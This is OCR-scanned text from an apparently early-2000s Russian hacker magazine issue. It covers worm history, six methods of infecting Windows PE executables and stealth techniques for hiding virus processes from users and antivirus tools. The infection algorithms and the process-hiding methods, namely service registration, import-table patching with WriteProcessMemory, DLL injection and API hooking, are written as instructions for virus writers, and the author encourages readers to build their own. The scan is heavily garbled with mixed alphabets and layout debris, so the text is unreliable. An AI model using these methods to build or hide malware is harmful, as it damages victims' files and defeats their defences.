же через спам в !РС-каналах либо 
приватах. 


Известный червь Jer находил сво- 
их жертв через IRC в виде безобид- 
ной ммеб-страницы, на которой нахо- 
дился ActiveX-meTog. Пользователь 
получал предупреждение от браузе- 
ра, но, как правило, отвечал согласи- 
ем на создание в системе файла. 
Скорее, чтобы отвязаться от назой- 
ливого окна. В итоге вирь записывал 
себя в виде п!ВС-скрипта, а также 
закреплялся в реестре. Как только 
на канале звучало кодовое слово, 
злоумышленнику предоставлялся 
удаленный шелл оля управления 
компьютером жертвы. 


| 


Именно здесь живут !ЮС-червяки 


Непосредственно через IRC nogxBa- 
тить заразу довольно трудно, если 
быть предельно бдительным. Чаще 
черви рассылают no DCC либо просят 
выполнить определенную команду. 
Без ведома пользователя зараза не 
распространится (если, конечно, в 
1ЮС-клиенте нет уязвимостей). 


ВАМ ПИСЬМО! 

m Самым излюбленным методом 
распространения червей является 
электронная почта. При этом неваж- 
но, какая система стоит у жертвы, а 
также нет необходимости искать уяз- 
вимость в операционке. Все происхо- 
дит "по желанию" пользователя - как 
правило, он открывает прилагающий- 
CA к ПИСЬМу аттач и запускает заразу. 


Примером стандартного аттачного 
червяка является вирус Согопех, на- 
писанный полностью на ассемблере. 


При открытии аттача с вирусом он копирует себя в c:\my 
downloads (либо в текущий каталог) под именем какой-ли- 
бо игры. При этом размер вируса становится около 10 ме- 
габайт. В определенное время происходит рассылка пи- 
сем по всей адресной книге. Вместе с письмом, как ты уже 
догадался, поставляется аттач ;) в виде копии червяка. 

Более известный вирус | Love You, заразивший ог- 
ромное количество машин, был написан Ha Visual Basic 
и при активизации рассылал почту по адресной книге 
Microsoft Outlook, а также вписывал себя в реестр и в 
скрипт [1КС-клиента (если таковой присутствовал). При 
этом его не замечал никакой антивирус, благодаря че- 
му червь активно путешествовал по просторам интер- 
нета. Как ты знаешь, в теле вируса располагались 
строки, не относящиеся к коду: 


barok -loveletter(vbe) < i hate go to school > 
by: spyder / ispyder@mail.com / @GRAMMERSoft Group / 
Manila,Philippines 


Кроме этого, вирус несет разрушительные действия. Bo- 
первых, LoveLetter заменяет все \/В$-файлы на свою ко- 
пию. Во вторых, добавляет ко всем JPG и УРЕС-файлам 
расширение VBS и делает ту же процедуру, что и с VBS- 
скриптами. Старый файл вирь уничтожает. И, наконец, KO 
всем тр3З-файлам червяк добавляет дополнительное рас- 
ширение VBS (со своей копией), а на старый устанавлива- 
ет "скрытый" атрибут. 


Червь был написан филиппинским школьником в TOT 
день, когда он, прогуливая уроки, кодил на Бейсике за 
своим компьютером (как выяснилось позже ;)). Естествен- 
но, что при хорошей смекалке и умении программировать 
на любом языке, можно написать отличный червь, переда- 
ющийся через электронную почту. Это связано с тем, что 
не нужно портировать код эксплоита и беспокоиться о 
том, что уязвимость будет пропатчена - что-что, а перепис- 
ку по e-mail никто не запретит. 


Еще пример? Популярный вирус Klez когда-то зара- 
зил огромное число машин. Причем электронная поч- 
та была лишь одним способом проникновения. При 
открытии аттача червь ищет все расшаренные диски 
в сети и записывает себя на удаленный компьютер. 
При этом он сканирует локальные диски, выбирает 
любой файл с расширением txt .htm .doc .jpg .bmp .х!$ 
или .mpg, добавляет к нему окончание .exe и дозапи- 
сывает себя в бинарную структуру. 


По 13 числам месяца червь последовательно заражает 
все исполняемые сфайлы машины, заполняя их случайным 
содержимым. После этого восстановить бинарники уже не 
удается. Кроме этого, вирус заражает все .гаг-архивы, 90- 
бавляя в них свою копию. В теле червя хранится зашиср- 
рованный список адресов, с которых зараза отправляет 
себя по электронной почте, находя тем самым новую 
жертву в Сети ;). » 
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ВСЕ ЭТИ ФИШКИ ТЫ МОЖЕШЬ ЗАКАЗАТЬ 
НА НАШЕМ САЙТЕ WWW.XAKEP.RU, 
ИЛИ ПО ТЕЛЕФОНУ: (095) 928-0360, (095) 928-6089 


Уникаль- 
ность 
CodeRed бы- 
ла в том, что 
вирус не ис- 
пользовал 
никаких вре- 
менных и 
постоянных 
файлов в 
своей рабо- 
те. Червь 
переползал в 
систему в 
виде ТСРЛР 
пакета, за- 
тем селился 
в оперативке 
машины и 
искал новые 
жертвы. 


Известный 
червь Jer 
находил сво- 
их жертв че- 
рез IRC в ви- 
де безобид- 
ной web- 


страницы, на 
которой на- 
ходился 
ActiveX-me- 
Tog. Пользо- 
ватель полу- 
чал предуп- 
реждение от 
браузера, но, 
как правило, 
отвечал сог- 
ласием на 
создание в 
системе 
файла. Ско- 
рее, чтобы 
отвязаться 
от назойли- 
вого окна. 
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Advisory об уязвимости в Sadmind 


Существуют червяки, 
которые... лечат компьютеры 
от других червей. 


ДРУГИЕ ПЛАТФОРМЫ 

и К сведению, черви бывают не 
только под Windows и Linux, но и под 
любую систему, где существует ка- 
кая-нибудь удаленная уязвимость. 
Примером такой заразы является 
червяк под SunOS, имеющий назва- 
ние Sadmind. Для размножения 
червь использует старую багу в де- 
моне Sadmind, о которой не раз писал 
bugtraq (http://sunsolve.sun.com/pub- 
cgi/retrieve.p|?doctype=coll&doc=secb 
ull 191&type=O&nav=sec.sba). Для no- 
иска новой машины червяк случайно 
генерирует два первых числа |P-agpe- 
са, а затем перебирает полный ряд 
комбинаций для остальной части. 
После проникновения вирь создает 
файл .rhosts с отменой аутентифика- 
ции по ВРС и копирует себя на атаку- 
емый компьютер в каталог 
"/dev/cuc". Так как все это происхо- 
дит nog гоо{-правами, червь заносит 
себя в скрипт автозапуска, чтобы 
быть активным при следующем стар- 
те машины. 


Также существуют свои черви под 
MacOS и другие менее известные 
операционки. Правда, они не являют- 
ся революционными, так как в Сети 
очень мало компьютеров с древними 
системами. 


Я ПРИШЕЛ С МИРОМ! 

m Как это ни парадоксально, суще- 
ствуют червяки, которые... лечат 
компьютеры от других червей. Види- 
мо, у некоторых вирмейкеров-энтузи- 
астов возникло желание очистить 
глобал от грязи. Такие экземпляры 
также были признаны вирусами, хотя 
они и не приносят вреда. Это обус- 
лавливается тем, что программа заг- 
ружает процессор и оперативную па- 
мять, тем самым отрицательно ска- 
зываясь на производительности сис- 
темы. 


Примером такого "полезного" чер- 
Baka является CodeGreen. Проникнув 
в систему тем же путем, что и 


Ш www.viruslist.com/viruslist.html - энциклопедия всех известных 
вирусов. От Лаборатории Касперского. 
Ш www.sdteam.com/articles/hackO44.html - Малая вирусная эн- 


циклопедия. Часть первая. 


Ш! http://old.softerra.ru/review/security/7085/pagel.htm! - Малая 
вирусная энциклопедия. Часть вторая. 

Ш http://web-support.ru/net-security/sec_43_3.shtml - Малая ви- 
русная энциклопедия. Часть третья. 
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CodeRed, он уничтожает червя (если, 
конечно, он там присутствует), а так- 
же скачивает и устанавливает патч 
от Microsoft. В теле вируса содержит- 
ся следующий текст: 


Des HexXer's CodeGreen V1.0 


beta 

CodeGreen has entered your 
system 

it tried to patch your system 
and 

to remove CodeRedll's back- 
doors 


Этот текст доказывает добрые наме- 
рения создателя червяка. 


Сообщение от CodeGreen 


Аналогичным античервяком под 
Linux является Cheese. Попадая в 
систему, он выполняет ряд действий, 
которые направлены на уничтоже- 
ние сетевого червя Катеп. В пер- 
вую очередь, Cheese просматривает 
файл /etc/inetd.conf и удаляет из не- 
го все запущенные бэкдоры (кото- 
рые были предварительно оставле- 
ны Катеп'ом). Затем все стандартно: 
генерируются случайные |P-agpeca, 
на которые античервь пытается за- 
коннектиться. В удачном случае он 
закачивает себя на удаленную ма- 
шину, как это делал Катеп (на сер- 
вере выполняется код, который за- 
качивает вирус в формате ЦУЕМ- 
CODE с помощью популярной прог- 
раммы lynx). После этого червяк ак- 
тивизируется вновь и размножение 
повторяется. 


БУДЬ БДИТЕЛЕН! 

и При написании этой статьи прес- 
ледовались две цели. Во-первых, 
показать тебе все возможности чер- 
вей, а также методы их распростра- 
нения. А во-вторых, обратить твое 
внимание на собственную безопас- 
ность - не исключено, что на твоем 
компьютере вовсю орудует какой- 
нибудь LoveSan или Cheese. Обяза- 
тельно подпишись на рассылку 
Microsoft (хоть это и противно зву- 
чит ;)) и получай список уязвимос- 
тей и новых патчей, которые выхо- 
дят чуть ли не каждый день. Тем са- 
мым ты оградишь себя от ненужной 
заразы и сохранишь всю информа- 
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цию на своей машине. a 
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ВЕСЬ СОФТ ИЗ НОМЕРА! 


ужа — 
ко ipl 

ADWARE/SPYWARE Norton Antivirus 2003 СПАМ С. © 
Adaware 6.181 №032 Antivirus for Win9x Anti-Spam Filter 1.02 ws Je 1 
AD Muncher 4.51 NOD32 Antivirus for WinNT Bayeslt! 0.4 re gate? 4 . 
BPS Spyware Remover PC-Cillin 2003 Spam Bully for Outlook = | 
Proximitron 4.5 Panda Antivirus Platinum 7 Spam Bully for Outlook — 
SoftTBN SDK 1.2 avast! 4 Home Express 
SpywareBlaster 2.6 avast! 4 Pro Spam Eater Pro 4 i aise 
SpywareGuard 2.2 Stop! 4.10 McAfee Spamkiller 

McAfee VirusScan for UNIX McAfee Spamkiller for MS ирусы... все мы с ни- 
АНТИВИРУСЫ 4.24 Exchange ми сталкиваемся, ра- 
Dr.Web 4.30 McAfee VirusScan Home SpamPal 1.5 но или поздно. У ко- 
Dr.Web 4.29 for Linux and Edition 7.0 SpamAssasin 2.55 го-то эти встречи походят 
clients WinAntiSpam 1.18 относительно безболезнен- 
AMaViS 0.2.1 for Unix БРАНДМАУЭРЫ но, кто-то после них поду- 
Sophos 3.73 Kaspersky AntiHacker 1.5 АНТИТРОЯНЫ мывает о самоубийстве :). 
AntiVir Workstation 2.08 Kerio Personal Firewall 2.1.5 Antiy Ghostbusters 4 Хочешь знать, как действу- 
AntiVir Personal Edition 6.21 | Outpost 1.0 TrojanShield ет твой противник, как обе- 
eTrust Antivirus 7 Outpost 2.0 Pro Anti-Trojan 5.5 зопасить себя и как вычис- 
F-Secure Internet Security ZoneAlarm 3.7 DiamondCs TDS-3 тить заразу с наименьшими 
Kaspersky Antivirus Pro 4.5 ZoneAlarm Pro 4.0 Trojan Remover последствиями? А может ты 
Kaspersky Anti-Virus for TrojanHunter 3.6 хочешь наводить страх Ha 


Linux 


СОФТ OT NONAME 


Адресная книга v4.4.4 
Flexiblesoft Dialer II v3.43 
WebPictures v1.85 
Tweak-XP Pro v2.0.11c 
RazorLame V1.1.5.1342 
MagicTweak v2.50 
GoSURF v1.7 

MTSBalance v2.20 

Nero Burning Rom v6.0.0.15 
MTSDetail \1.14с 

ListTV v3.7.6 

Password Spy v1.01 
Шифратор-дешифратор 
файлов \1.54 

NetInfo v4.8 804 
PrintMonitor v1.2 


весь мир своим супер onac- 
ным и неубиваемым виру- 
сом? В любом случае, на 
| диске ты найдешь кучу за- 
щитных утилит, которые 
после установки и грамот- 
ной настройки превратят 
твой компьютер в настоя- 
щий бастион. И доки, кото- 
рые помогут тебе разобрать- 
ся в устройстве вирусов. И 
как обычно, последние об- 
новления для Windows и 
софт от МоМате. 


Vcdromx v4.1 
nnCron LITE v1.13 
Keyword Live v2.20 
Fast Browser Pro v6.01 
Keyword Extractor v1.03 
Advanced Dialer v2.5f 
NetLimiter v1.21 (beta) 
FTP Voyager v10.0.0.4 
Advanced Viewer v0.65 
(build 120) 

ArtMoney v6.27 

Web Compressor v1.03 
Mobile Net Switch v1.9.8 
Идеальный партнер v1.58 
Рго 

TimeRecorder v3.3.5 


Pornosaur v1.44 
FreeMemory v1.95 

АОН Pro v5.5 

MobyDock DX \0.77а 
TrackSeek v2.07 
WinOrganizer v2.4 (build 
450) 

WebDrive v5.30 

Flash Saver v4.0 
FastCache v1.01 

BIOS Patcher v4.00.RC.F 
AltDesk v1.5.2 

Mail Them Pro v5.2.1 
System Commander v7.05 
Карточная игра в дурака 
v3.0 
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Эдайн Гхэлл 


ЗАРАЖЕНИЕ 
ФАИЛОВ 


6 СПОСОБОВ ИНФИЦИРОВАТЬ РЕ-ФАЙЛ 


так, рассмотрим уст- 


ройство файла: 


РЕ заголовок. 


Файл начинается с DOS части, кото- 
рая нужна лишь в целях совмести- 
мости. В самом начале располагается 
простая программа, единственной 
целью которой является вывод на эк- 
ран строки: This program must Бе run 
under Win32. 

Впрочем, эта часть нам не понадобится, 


важно знать лишь две вещи: то, что 
любой срайл начинается с двух байт - 
"MZ", и то, что по адресу 3ch от начала 
файла лежит смещение РЕ заголовка. 
Последний очень важен, и нужно оста- 
новиться на нем подробнее. 


...5Кр.... 


Skip... 


Skip... 


Skip... 


РЕ заголовок содержит довольно MHO- 
го полей, поэтому все, что не касается 
непосредственно заражения, было 
выброшено. Так что, если тебе нужно 
более обширное описание РЕ cpopma- 
та, смотри ссылки в конце статьи. Я 
лишь коротко пробегусь по тем полям, 
значения в которых нужно менять при 
заражении. Заголовок начинается со 
слова "РЕ" и двух нулей. Num of 
Objects - число размером в слово, со- 
держащее количество секций в файле. 
NT header Size - используя это поле, 
можно получить размер всего заголов- 
ка. Он будет равен: NT header Size + 
18h. Entry point RVA - смещение в фай- 
ле, по которому передается управле- 
ние при запуске файла. Image Base - 
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адрес, по которому, производится заг- 
рузка cpaiina в память (обычно 
0x00400000). Object align и file align - 
выравнивание, важная вещь, и о нем 
стоит поговорить подробнее. Как ви- 
дишь, оно тут двух видов: выравнива- 
ние секций (object align) и файловое 
выравнивание(#е align). Это обуслов- 
лено спецификой работы компьютера - 
чтение информации с жесткого диска 
производится секторами, а из памяти 
страницами. Т.е. если файл занимает 1 
байт, с диска будет все равно прочита- 
но 512 (1 сектор). Поэтому размер cpan- 
ла на диске дополняется нулями (вы- 
равнивается) до определенного значе- 
ния (обычно 512). То же самое в памя- 
ти, только там выравнивание обычно 
происходит на одну страницу (10001). 
Проще говоря, выравнивание - это ок- 
ругление до определенной константы, 
нужное для оптимизации работы 
компьютера (или для усложнения жиз- 
ни вирмейкерам, но это уж кому как). 
Image Size - виртуальный размер всего 
файла вместе с заголовками. 

Прежде чем перейти к дальнейшему 
описанию, нужно прояснить одну важ- 
ную вещь - РЕ файл состоит из секций. 
Одна секция может содержать код, 
данные, таблицу импорта или что-ни- 
будь еще. Главная сложность заклю- 
чается в том, что секция на диске не 
обязательно соответствует секции в 
памяти. Это происходит по нескольким 
причинам: отчасти из-за выравнива- 
ния, о котором было сказано выше, а 
еще потому, что существует такая 
вещь, как неинициализированные дан- 
ные. К примеру, если в листинге напи- 
сать: buffer rb 1000h, то размер срайла 
на диске не увеличится ни на байт. 
Другое дело в памяти, здесь он будет 
больше ровно Ha 1000h. Информация 
о секциях хранится в специальной таб- 
лице. Она идет сразу же после РЕ заго- 
ловка и состоит из набора заголовков 
секций. Каждый заголовок описывает 
одну секцию сфайла: ее размер, адрес 
загрузки, параметры и т.п. 

Это была последняя таблица, знание 
которой необходимо для заражения 
файлов. И последняя вещь: прежде 
чем начинать работать с сайлом, ви- 
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„...Хорошо видно, что секции 
выравниваются нулями 


русу нужно проверить, что это 
действительно РЕ файл. Исходя из 
всего вышесказанного, получаем 
простенький алгоритм проверки: 


Ф. Прочитать файл в память (по ag- 
ресу хххххххх). 

@. Проверить первые два байта на 
соответствие MZ. 

@. Взять смещение РЕ заголовка по 
адресу хххххххх+ЗсВ. 

©. Выровнять его на адрес загрузки 
(прибавить хххххххх). 

@. Проверить первые два байта на 
соответствие "РЕ". 


Способ первый. 

Запись в конец последней 
секции 

Это способ является самым простым, 
и при этом довольно эффективным. 
Именно поэтому его используют боль- 
шинство вирусов. Действительно, за- 
пись вируса в конец сайла (т.е. в пос- 
леднюю секцию) кажется наиболее 
логичной. Но есть и недостаток - все 
антивирусы очень внимательны к 
последней секции файла. Особенно, 
если туда указывает ImageBase. Впро- 
чем, для начала - это лучший способ. 
Алгоритм заражения такой: 


object name имя секции 


виртуальный размер секции, 
virtual size т.е. размер после загрузки 
в память 


Section гуа |адрес начала секции в памяти 


размер секции на диске 


Physical size 
Physical оНзе! | смещение секции в файле 


флаги секции, с помощью них 
. можно установить права 
Object flags у 
записи, чтения и исполнения 
содержимого секции 


©. Получить смещение последней 
секции, умножив количество секций 
на 28h. 

©. Увеличить virtual size секции на 
виртуальную длину вируса. 

©. Увеличить physical size секции на 
физическую длину вируса. 

@. Записать тело вируса по адресу 
Physical offset + Physical size. 

©. Изменить EntryPoint в PE 3aro- 
ловке на начало вирусного кода. 

О. Увеличить ImageSize на вирту- 
альную длину вируса. 
Вот и все, как видишь - очень просто. 
Единственное, что еще нужно доба- 
вить, в данном случае виртуальная 
длина вируса - это длина вируса, вы- 
ровненная на Virtual align, а физичес- 
кая длина - соответственно, длина, 
выровненная Ha physical align. 


Способ второй. 

Добавление новой секции 

Тоже очень популярный и простой 
метод. Несложно добавить еще одну 
запись в Object table и записать тело 
вируса в конец сфайла. Ho, как и у 
предыдущего способа, есть большой 
минус - любой мало-мальски уважаю- 
щий себя антивирус прибьет твой ви- 
рус как нечего делать. 

Не идеально, но намного лучше, go- 
бавляя новую секцию, записывать ее 
не в конец файла, как это делается 
обычно, а в начало. Остальные сек- 
ции при этом сдвигаются. С точки зре- 


ния антивируса определить наличие 
вируса будет уже намного сложнее. 


Способ третий. 

НЕЕ метод 

Это далеко не самый лучший способ. Я 
бы даже назвал его ламерским. Но он 
существует, и даже есть люди, исполь- 
зующие его в своих вирусах. Своим 
появлением этот метод обязан языкам 
высокого уровня (и именно в них он 
применяется чаще всего). Суть в том, 
что вирус заменяет собой заражае- 
мый срайл, который просто присоеди- 
няется к телу вируса. Во время запус- 
ка вирус извлекает из себя программу 
и запускает ее. Реализовать такой 
способ очень легко, да к тому же мож- 
но упаковывать исходный файл, и тог- 
да размер зараженного срайла не уве- 
личится. Но на этом плюсы данного 
метода заканчиваются. Короче говоря, 
я надеюсь, ты никогда не будешь за- 
ражать дайлы таким способом. 


Способ четвертый. 

Заражение первой секции 
Данный способ довольно сложен в 
реализации. Но оно того стоит. При 
заражении вирус дописывается к кон- 
цу первой секции. Все остальные сек- 
ции сдвигаются. Если все сделать гра- 
мотно, антивирусу будет очень слож- 
но определить наличие вируса. 


Способ пятый. 

Запись в свободное место 
Очень продвинутый способ. Именно 
он применялся в небезызвестном ви- 
русе Чернобыль. 

Вирус записывался в свободное место в 
каждой секции, а стартовый код поме- 
щал в свободные поля в заголовке. Рас- 
сматривая РЕ формат, я говорил о вы- 
равнивании. Так вот, именно благодаря 
выравниванию этот способ имеет место. 
Открой любой exe-cpaiin и посмотри 
внимательно. Наверняка ты увидишь 
довольно много нулей. Это загрузчик с 
их помощью дополняет размер секции 
go НЕ align. Именно на место этих нулей 
мы и будем записываться. 

Причем если секций в файле нес- 
колько, и в одну вирус не умещается 
(а так бывает чаще всего), придется 
разбить вирус на несколько частей и 
записывать их в разные секции, свя- 
зав jmp'amu. Главное при этом - пра- 
вильно посчитать смещения, учиты- 
вая виртуальные адреса секций и их 
размеры. 

После такого любой антивирус отды- 
хает. 


Способ шестой. 

Интеграция с телом программы 
Это элитный способ, применить кото- 
рый по силам немногим. По-моему, 
впервые он был освещен в работах 


Ш www.wasm.ru/doclist.php?list=2 - описание формата PE от 


Hard Wisdom'a. 
Ш http://zOmbie.host.sk - сайт вирмейкера 2ОтЫе. 


р. 


известного московского вирмейкера 
zOmbie. И осуществлен им же, в виру- 
ce Mistfall-z10. Алгоритм заражения 
этого вируса такой: 


@. Дизассемблировать файл. 


®. Интегрировать срайл с телом вируса. 


©. Ассемблировать срайл. 


Круто, да? Никаких тебе записей в ко- 
нец файла и HLL извратов. Вирус 
просто растворяется в теле програм- 
мы, становясь ее неотделимой 
частью. Наверное, не нужно говорить, 
что антивирусам тут ничего не светит. 
Я ничего не скажу о реализации дан- 
ного способа, т.к. для ее описания мне 
не хватило бы всего журнала, но ты 
сможешь найти нужную информацию 
на страничке 7Отые. 


fuk: 2 74 % = 
==: - ай 


Антивирусы научились детектировать 
210 только через год после его выхода! 


эпилог 

ш Теперь ты знаешь, как заражают- 
ся файлы. Да и не только знаешь - 
вполне можешь сам замутить что-то 
подобное. Начать стоит, конечно, с 
первого способа. Хорошо освоив его, 
можно попробовать многообещаю- 
щий пятый способ. Ну, а если ты сов- 
сем крутой вирмейкер, то шестой спо- 
соб - твой выбор. a 


Наверняка 
ты увидишь 
довольно 
много ну- 
лей. Это 


загрузчик с 
их помощью 
дополняет 
размер сек- 
ции go file 
align. Имен- 
но на место 
этих нулей 
мы и будем 
записы- 
ваться. 


РЕ файл 
состоит из 
секций. Одна 
секция мо- 
жет содер- 
жать код, 
данные, таб- 
лицу импор- 
та или что- 
нибудь еще. 
Главная 
сложность 
заключается 
в том, что 
секция на 
диске не 
обязательно 
соответ- 
ствует сек- 
ции в памя- 
ти. 


Касатенко Иван aka SkyWri 


ПИШЕМ 
СВОЙ СТЕЛС 


ПИШЕМ СВОЙ СТЕЛС | 


г (sky@real.xakep. 


СТЕЛС-ТЕХНОЛОГИИ В ВИРУСАХ 


ЗАЧЕМ НУЖНЫ 


СТЕЛС- 


ТЕХНОЛОГИИ 


m Представляешь, си- 
р | дишь ты пару недель, 
корпишь над написанием вируса. И 
вот после этого ты выпускаешь его на 
волю, в интернет. Он живет себе, 
размножается, заражая машины нес- 
частных лопухов. И Bgpyr находится 
один умный юзер, запускает прос- 
тенький менеджер процессов и без 
труда находит твой вирус, после чего 
отсылает его в какую-нибудь антиви- 
русную лабораторию. А уж там анти- 
вирусописатель тратит всего несколь- 
ко минут, чтобы добавить его в базу 
своего суперантивируса. И все. Оста- 
ется только регулярно приносить цве- 
ты на могилу своего творения. 

Как же с этим бороться? Существует 
множество способов, причем приду- 
мывать их начали с самого момента 
появления антивирусов, способных 
искать заразу по сигнатурам. Хорошо 
известны такие технологии скрытия 
вирусного кода, как полимороизм (в 
различных его формах), применение 
стелс-технологий. В этой статье мы 
рассмотрим стелс-технологии. 

Что же это такое? Ну, начнем с пере- 
вода слова "стелс": by stealth - украд- 
кой, втихомолку, тайком. Действи- 
тельно, это слово в полной мере отра- 
жает суть дела, т.к. задача стелс-виру- 
са состоит именно в том, чтобы 
скрыть свое присутствие в компьюте- 
ре от операционной системы и всего 
ПО, которое использует ее функции 
для доступа к файлам, списку процес- 
COB и Т.П. 


СТЕЛС ДЕДУШКИ- 
ФРОНТОВИКА 

mw Итак, с чего все началось. Пер- 
вые стелс-вирусы появились давно, 
когда Microsoft был маленьким, а 
компьютеры большими. Многие ис- 
пользовали тогда получающий расп- 
ространение MS-DOS. В нем обжива- 
лась и зараза. Сначала простейшая, 
а потом все более и более совершен- 
ная. Но насколько бы ни была она со- 
вершенна, ее всегда обнаруживал 
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ПРАВИЛА 


рис. Константин Комардин 


антивирус. Вирусописатели перепро- 
бовали все: кодирование вирусов, 
изменение кода дополнением "пус- 
тых" инструкций, вроде МОР или пос- 
ледовательных PUSH/POP - со вре- 
менем такие приемы переставали 
действовать. 

Вот тут-то и пришло время задумать- 
ся о скрытии присутствия вирусов в 
ПК. Действительно, все гениальное 
просто: зачем изобретать хитрейшую 
систему мутации вируса, если можно 
просто сделать так, чтобы никто не 
знал, что этот вирус в компе есть?! 
Дело оставалось за малым: приду- 
мать и реализовать скрывающую ви- 
русный код систему. Недолго размыш- 


лял над этой задачей всеобщий гений 
\Х-сцены. В короткие сроки появи- 
лись первые стелс-вирусы. 

Что они делали? Сначала они были 
элементарны: перехватывали систем- 
ное прерывание MS-DOS 21h и на вы- 
зовы чтения/записи срайлов подстав- 
ляли незараженные программы. Так 
антивирусы впервые оказались жес- 
токо обмануты, однако ненадолго, go 
тех пор, пока не научились читать 
срайлы посредством BIOS. 

И вот началась "гонка вооружений", 
кто кого обманет: вирусы перехваты- 
вали BIOS, антивирусы использовали 
порты B/B, вирусы блокировали по- 
добные инструкции ит.д. 


Интересно, чем это кончилось? Время 
стелс-вирусов ушло с появлением 

"сверхзащищенной" OC Microsoft Ш Хочешь посмотреть программу, модифицирующую ядро, 
Windows. в действии? Внимательно следи за процессом apihook.exe ;). 


НАСТОЯЩАЯ СИТУАЦИЯ Внедряемся в ядро и исправляем FindXXXProcess... 


m Ушло, но навсегда ли? Признать- 
ся, я мало слышал о вирусах под 
Winl6. Видимо, их мало писали, то ли 
потому, что в Windows 3.xx было и так 
достаточно глюков, то ли потому, что 
вирьмейкеры не оправились еще от 
удара Microsoft. HeacHo. 

Ho Вынь росла и ширилась, и, нако- 
нец, удвоила циферку после своего 
имени: Win32 получала все большее и 
большее распространение. Вирусопи- 
сатели один за другим пересели на 
ASM nog Win32. 

Проблемы оказались в чем-то схожи- 
ми с М5-ОО5'овскими: надо было 
скрыть вирус. Правда, решение их ока- 
залось намного сложнее: во-первых, 
из-за того, что Win32-npunomeHna ра- 
ботают исключительно в среде защи- 
щенного режима процессора, во-вто- 
рых, в Win гораздо больше функций 
для работы с объектами (файлами, 


ApiHook ОМ. .. допе 


| 


ee eT 
| ВЕ ВЕБЕБЕВЕНЕЕННЕЕ С 


Помимо 
процессами), да и объектов стало по- скрытия из 
более, а, значит, и больше следов, ко- списка 

YF процессов, 
торые может оставить вирусный код. мы получим 
Но гений вирьмейкеров и тут их не еще одно 
подвел. Бессонные ночи кодинга сде- | НН 


лали свое дело: слово "стелс" возро- ЧЕ Чт = 
дилось из пепла. неа ы ETE инь eee 
Что же должен скрывать "идеаль- 
ный" современный стелс-вирус (бу- 
дем считать, что он резидентный и 


распространяется, помимо прямого ..И возвращаем все на свои места! Bidets 
заражения файлов, еще и по e-mail)? завтра?.. 


Давай по порядку. 
Во-первых, он должен скрывать свое ApiHook OF F...done 
присутствие, когда запущен, то есть 
скрывать свой процесс, если уже ра- 
ботает, конечно, не в адресном прост- 


Время 
ранстве жертвы. Во-вторых, ему необ- стелс-виру- 

сов ушло с 
ходимо спрятать от посторонних глаз rode nalineis 
все соединения с окружающим миром "сверхза- 

а" 

(при рассылке себя по почте). В-треть- oo 
их, никто не должен видеть вирусный Microsoft 
код в файлах. Latah 
Все это можно сделать, перехватив навсегда 
системные вызовы АР! на каком-либо ли? 


уровне - либо на уровне пользовате- 
ля, либо на уровне ядра. 


51 
il 


(SESEEERRRSESESERES 


ПРОЦЕСС, ПОКАЖИ ЛИЧИКО 

m Начнем со скрытия процессов. 
Мне видится целый ряд способов, при 
помощи которых это можно сделать. 
Итак, способ первый и самый простой: 
надо лишь зарегистрировать текущий 
процесс как сервис, воспользовав- 
шись системной АР!|-функцией: 


ISG GCSES RSG 
= 


RegisterServiceProcess(NULL, 1); 


: ЕЕ 


Помимо скрытия из списка процессов, 
мы получим еще одно приятное свой- 
ство: наша сосртина продолжит рабо- 
тать даже после выхода пользовате- 
ля из системы. Минус этого способа у 


Слабо повторить? ;-) 


by stealth - 
украдкой, 
втихомолку, 
тайком 
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заключается в TOM, что работает OH 
лишь в Win9x, ав NT ни к чему не 
приведет. 

Способ номер два состоит во внедре- 
нии в тело чужого процесса в памяти 
прямо "на лету". Теоретически это 
очень просто: нужно создать об- 
ласть памяти, которая будет доступ- 
на жертве, а затем каким-то образом 
запустить в ее адресном простран- 
стве код, который создаст еще один 
тред, обслуживающий вирус. На 
практике все немного сложнее ;-). 
Для начала нам необходимо зареги- 
стрировать фрагмент памяти, в кото- 
ром будет лежать код (для этого 
можно воспользоваться функциями 
OpenFileMapping и MapViewOfFile из 
kernel32.dll). Туда-то мы и поместим 
код треда, который будет выполнять- 
ся в процессе-жертве. Теперь необ- 
ходимо заставить жертву запустить 
этот тред. Как же выполнить какой- 
то код в чужом адресном простран- 
стве? Есть, пожалуй, два пути: один - 
это использование 
CreateRemoteThread, а второй - это 
замена адреса какой-то импортиро- 
ванной из системной библиотеки 
функции (например, GetDC из 
09132.41) на адрес своей функции, 
предварительно записанной в про- 
цесс. У первого пути при всех его по- 
ложительных моментах (например, 
предельной простоте) один минус - 
он работает лишь на МТ, но ты ведь 
хочешь универсальности, правда? 
Поэтому рассмотрим второй. 


угодно. Сравните весь тот бред, что 
был написан про второй способ, с ла- 
коничным куском кода: 


// hProcess - xeHgn процесса 

// szDllPath - путь к подгружае- 
мой библиотеке 

DetourContinueProcessWithDIlA 
(hProcess, szDlIPath); 


Он загрузит в жертву нашу DLL'ky, в 
сункции ProcessAttach которой ты 
пропишешь все, что собираешься 
сделать. Просто, как раз-два-три. 
Неприятно одно: с собой приходится 
таскать целую библиотеку подгружа- 


жем изменять физическую память, в 
том числе и наши функции. Kak по- 
пасть в нулевое кольцо защиты? Для 
этого существует специальный меха- 
низм эскалации привилегий в процес- 
copax дфирмы Intel. 

Этот способ, хотя и достаточно прост в 
описании, на практике оказывается са- 
мым сложным, потому как программи- 
рование на уровне ядра - это хожде- 
ние по лезвию бритвы, чуть что не так, 
и наблюдаешь за красивым синим эк- 
раном :). Но зато это и единственный 
по-настоящему надежный путь. В са- 
мом деле, какому антивирусу захочет- 
ся копаться в пучинах кернела? 


программирование на уровне ядра - 
это хождение по лезвию бритвы, 
чуть что не так, и наблюдаешь 
за красивым синим экраном °). 


емых багов aka DLL :), что, согласись, 
в вире - излишне. 

Четвертый способ я опишу лишь 
концептуально, без деталей, а то я 
уж больно сильно увлекся кодингом 
:). Этот способ состоит в подмене 
функции, которая выдает приложе- 
ниям список процессов. Точнее не 
функции, а ряда функций: 
Process32First и Process32Next. Тут 
же напрашивается идея использова- 


Естественно, стоит переписывать 
какую-то часто используемую 
бфрункцию, например, GetMessage. 


Не будем заострять внимание на по- 
иске и открытии хендла самого про- 
цесса, а перейдем сразу к делу: запи- 
шем в программу код запуска треда 
вируса. После этого нам надо найти 
таблицу импортируемых функций 
программы и переписать адрес одной 
из импортированных функций так, 
чтобы он указывал на наш код запус- 
ка. И то, и другое можно сделать при 
помощи функций ReadProcessMemory 
и WriteProcessMemory. Естественно, 
стоит переписывать какую-то часто ис- 
пользуемую функцию, например, 
GetMessage. Но не забудь, что после 
запуска своего кода необходимо вер- 
нуть все на свои места, а то жертва пе- 
рестанет корректно функционировать. 
Третий способ чуть легче, он особен- 
но удобен, если ты пишешь свое де- 
